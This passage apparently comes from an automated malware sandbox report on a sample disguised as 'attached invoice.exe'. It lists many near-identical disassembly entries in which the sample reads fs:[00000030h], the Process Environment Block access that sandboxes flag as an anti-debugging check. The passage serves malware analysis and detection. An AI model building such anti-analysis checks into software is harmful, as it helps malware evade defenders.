                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922539 mov eax, dword ptr fs:[00000030h]4_2_01922539
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E254C mov eax, dword ptr fs:[00000030h]4_2_018E254C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01976550 mov eax, dword ptr fs:[00000030h]4_2_01976550
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FE547 mov eax, dword ptr fs:[00000030h]4_2_018FE547
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AA553 mov eax, dword ptr fs:[00000030h]4_2_019AA553
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01916540 mov eax, dword ptr fs:[00000030h]4_2_01916540
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01918540 mov eax, dword ptr fs:[00000030h]4_2_01918540
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FC560 mov eax, dword ptr fs:[00000030h]4_2_018FC560
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C490 mov eax, dword ptr fs:[00000030h]4_2_0196C490
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0485 mov ecx, dword ptr fs:[00000030h]4_2_018E0485
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191648A mov eax, dword ptr fs:[00000030h]4_2_0191648A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191648A mov eax, dword ptr fs:[00000030h]4_2_0191648A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191648A mov eax, dword ptr fs:[00000030h]4_2_0191648A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E24A2 mov eax, dword ptr fs:[00000030h]4_2_018E24A2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E24A2 mov ecx, dword ptr fs:[00000030h]4_2_018E24A2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019784BB mov eax, dword ptr fs:[00000030h]4_2_019784BB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E4BC mov eax, dword ptr fs:[00000030h]4_2_0191E4BC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019144A8 mov eax, dword ptr fs:[00000030h]4_2_019144A8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019044D1 mov eax, dword ptr fs:[00000030h]4_2_019044D1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019044D1 mov eax, dword ptr fs:[00000030h]4_2_019044D1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019844F8 mov eax, dword ptr fs:[00000030h]4_2_019844F8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019844F8 mov eax, dword ptr fs:[00000030h]4_2_019844F8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A4F0 mov eax, dword ptr fs:[00000030h]4_2_0191A4F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A4F0 mov eax, dword ptr fs:[00000030h]4_2_0191A4F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196E4F2 mov eax, dword ptr fs:[00000030h]4_2_0196E4F2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196E4F2 mov eax, dword ptr fs:[00000030h]4_2_0196E4F2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E4EF mov eax, dword ptr fs:[00000030h]4_2_0191E4EF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E4EF mov eax, dword ptr fs:[00000030h]4_2_0191E4EF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E64F0 mov eax, dword ptr fs:[00000030h]4_2_018E64F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D640D mov eax, dword ptr fs:[00000030h]4_2_018D640D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01976400 mov eax, dword ptr fs:[00000030h]4_2_01976400
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01976400 mov eax, dword ptr fs:[00000030h]4_2_01976400
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0445 mov eax, dword ptr fs:[00000030h]4_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E45E mov eax, dword ptr fs:[00000030h]4_2_0190E45E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E45E mov eax, dword ptr fs:[00000030h]4_2_0190E45E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E45E mov eax, dword ptr fs:[00000030h]4_2_0190E45E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E45E mov eax, dword ptr fs:[00000030h]4_2_0190E45E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E45E mov eax, dword ptr fs:[00000030h]4_2_0190E45E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960443 mov eax, dword ptr fs:[00000030h]4_2_01960443
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196E461 mov eax, dword ptr fs:[00000030h]4_2_0196E461
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8470 mov eax, dword ptr fs:[00000030h]4_2_018E8470
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8470 mov eax, dword ptr fs:[00000030h]4_2_018E8470
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AA464 mov eax, dword ptr fs:[00000030h]4_2_019AA464
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E79D mov eax, dword ptr fs:[00000030h]4_2_0195E79D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0197C7B0 mov eax, dword ptr fs:[00000030h]4_2_0197C7B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0197C7B0 mov eax, dword ptr fs:[00000030h]4_2_0197C7B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E07A7 mov eax, dword ptr fs:[00000030h]4_2_018E07A7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov eax, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019847B4 mov ecx, dword ptr fs:[00000030h]4_2_019847B4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E7E0 mov eax, dword ptr fs:[00000030h]4_2_0190E7E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E471B mov eax, dword ptr fs:[00000030h]4_2_018E471B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E471B mov eax, dword ptr fs:[00000030h]4_2_018E471B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190270D mov eax, dword ptr fs:[00000030h]4_2_0190270D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190270D mov eax, dword ptr fs:[00000030h]4_2_0190270D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190270D mov eax, dword ptr fs:[00000030h]4_2_0190270D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A750 mov eax, dword ptr fs:[00000030h]4_2_0191A750
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov eax, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov eax, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov eax, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov ecx, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov eax, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902755 mov eax, dword ptr fs:[00000030h]4_2_01902755
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0198E750 mov eax, dword ptr fs:[00000030h]4_2_0198E750
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01910774 mov eax, dword ptr fs:[00000030h]4_2_01910774
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F2760 mov ecx, dword ptr fs:[00000030h]4_2_018F2760
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E4779 mov eax, dword ptr fs:[00000030h]4_2_018E4779
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E4779 mov eax, dword ptr fs:[00000030h]4_2_018E4779
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C691 mov eax, dword ptr fs:[00000030h]4_2_0196C691
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0680 mov eax, dword ptr fs:[00000030h]4_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8690 mov eax, dword ptr fs:[00000030h]4_2_018E8690
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A86A8 mov eax, dword ptr fs:[00000030h]4_2_019A86A8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A86A8 mov eax, dword ptr fs:[00000030h]4_2_019A86A8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E06CF mov eax, dword ptr fs:[00000030h]4_2_018E06CF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019766D0 mov eax, dword ptr fs:[00000030h]4_2_019766D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019766D0 mov eax, dword ptr fs:[00000030h]4_2_019766D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AA6C0 mov eax, dword ptr fs:[00000030h]4_2_019AA6C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019886C2 mov eax, dword ptr fs:[00000030h]4_2_019886C2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C6F2 mov eax, dword ptr fs:[00000030h]4_2_0195C6F2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C6F2 mov eax, dword ptr fs:[00000030h]4_2_0195C6F2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EC6E0 mov eax, dword ptr fs:[00000030h]4_2_018EC6E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019066E0 mov eax, dword ptr fs:[00000030h]4_2_019066E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019066E0 mov eax, dword ptr fs:[00000030h]4_2_019066E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4600 mov eax, dword ptr fs:[00000030h]4_2_019B4600
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01910630 mov eax, dword ptr fs:[00000030h]4_2_01910630
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01968633 mov esi, dword ptr fs:[00000030h]4_2_01968633
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01968633 mov eax, dword ptr fs:[00000030h]4_2_01968633
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01968633 mov eax, dword ptr fs:[00000030h]4_2_01968633
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C620 mov eax, dword ptr fs:[00000030h]4_2_0191C620
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0630 mov eax, dword ptr fs:[00000030h]4_2_018E0630
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191265C mov eax, dword ptr fs:[00000030h]4_2_0191265C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191265C mov ecx, dword ptr fs:[00000030h]4_2_0191265C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191265C mov eax, dword ptr fs:[00000030h]4_2_0191265C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C640 mov eax, dword ptr fs:[00000030h]4_2_0191C640
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C640 mov eax, dword ptr fs:[00000030h]4_2_0191C640
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922670 mov eax, dword ptr fs:[00000030h]4_2_01922670
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922670 mov eax, dword ptr fs:[00000030h]4_2_01922670
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196E660 mov eax, dword ptr fs:[00000030h]4_2_0196E660
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191666D mov esi, dword ptr fs:[00000030h]4_2_0191666D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191666D mov eax, dword ptr fs:[00000030h]4_2_0191666D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191666D mov eax, dword ptr fs:[00000030h]4_2_0191666D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0670 mov eax, dword ptr fs:[00000030h]4_2_018E0670
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01980980 mov eax, dword ptr fs:[00000030h]4_2_01980980
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01980980 mov eax, dword ptr fs:[00000030h]4_2_01980980
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C98F mov eax, dword ptr fs:[00000030h]4_2_0191C98F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C98F mov eax, dword ptr fs:[00000030h]4_2_0191C98F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C98F mov eax, dword ptr fs:[00000030h]4_2_0191C98F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019189B0 mov edx, dword ptr fs:[00000030h]4_2_019189B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019769B0 mov eax, dword ptr fs:[00000030h]4_2_019769B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019769B0 mov eax, dword ptr fs:[00000030h]4_2_019769B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019769B0 mov ecx, dword ptr fs:[00000030h]4_2_019769B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A0 mov eax, dword ptr fs:[00000030h]4_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019689A0 mov eax, dword ptr fs:[00000030h]4_2_019689A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E89C0 mov eax, dword ptr fs:[00000030h]4_2_018E89C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E89C0 mov eax, dword ptr fs:[00000030h]4_2_018E89C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B29CF mov eax, dword ptr fs:[00000030h]4_2_019B29CF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B29CF mov eax, dword ptr fs:[00000030h]4_2_019B29CF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019149F0 mov eax, dword ptr fs:[00000030h]4_2_019149F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019149F0 mov eax, dword ptr fs:[00000030h]4_2_019149F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E09F0 mov eax, dword ptr fs:[00000030h]4_2_018E09F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01936912 mov eax, dword ptr fs:[00000030h]4_2_01936912
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01912919 mov eax, dword ptr fs:[00000030h]4_2_01912919
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01912919 mov eax, dword ptr fs:[00000030h]4_2_01912919
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0193693A mov eax, dword ptr fs:[00000030h]4_2_0193693A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0193693A mov eax, dword ptr fs:[00000030h]4_2_0193693A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0193693A mov eax, dword ptr fs:[00000030h]4_2_0193693A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A892E mov eax, dword ptr fs:[00000030h]4_2_019A892E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A892E mov eax, dword ptr fs:[00000030h]4_2_019A892E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C920 mov ecx, dword ptr fs:[00000030h]4_2_0195C920
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C920 mov eax, dword ptr fs:[00000030h]4_2_0195C920
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C920 mov eax, dword ptr fs:[00000030h]4_2_0195C920
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C920 mov eax, dword ptr fs:[00000030h]4_2_0195C920
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B492D mov eax, dword ptr fs:[00000030h]4_2_019B492D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01904955 mov eax, dword ptr fs:[00000030h]4_2_01904955
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01904955 mov eax, dword ptr fs:[00000030h]4_2_01904955
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C958 mov eax, dword ptr fs:[00000030h]4_2_0191C958
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C944 mov eax, dword ptr fs:[00000030h]4_2_0191C944
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E94E mov eax, dword ptr fs:[00000030h]4_2_0190E94E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F096B mov eax, dword ptr fs:[00000030h]4_2_018F096B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F096B mov eax, dword ptr fs:[00000030h]4_2_018F096B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6970 mov eax, dword ptr fs:[00000030h]4_2_018E6970
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01998890 mov eax, dword ptr fs:[00000030h]4_2_01998890
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01998890 mov eax, dword ptr fs:[00000030h]4_2_01998890
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01906882 mov eax, dword ptr fs:[00000030h]4_2_01906882
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01906882 mov eax, dword ptr fs:[00000030h]4_2_01906882
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01906882 mov eax, dword ptr fs:[00000030h]4_2_01906882
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196488F mov eax, dword ptr fs:[00000030h]4_2_0196488F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192088E mov eax, dword ptr fs:[00000030h]4_2_0192088E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192088E mov edx, dword ptr fs:[00000030h]4_2_0192088E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192088E mov eax, dword ptr fs:[00000030h]4_2_0192088E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E08CD mov eax, dword ptr fs:[00000030h]4_2_018E08CD
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E08CD mov eax, dword ptr fs:[00000030h]4_2_018E08CD
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D88C8 mov eax, dword ptr fs:[00000030h]4_2_018D88C8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D88C8 mov eax, dword ptr fs:[00000030h]4_2_018D88C8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C0 mov eax, dword ptr fs:[00000030h]4_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019148F0 mov eax, dword ptr fs:[00000030h]4_2_019148F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019788FB mov eax, dword ptr fs:[00000030h]4_2_019788FB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA8F0 mov eax, dword ptr fs:[00000030h]4_2_018EA8F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C819 mov eax, dword ptr fs:[00000030h]4_2_0191C819
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C819 mov eax, dword ptr fs:[00000030h]4_2_0191C819
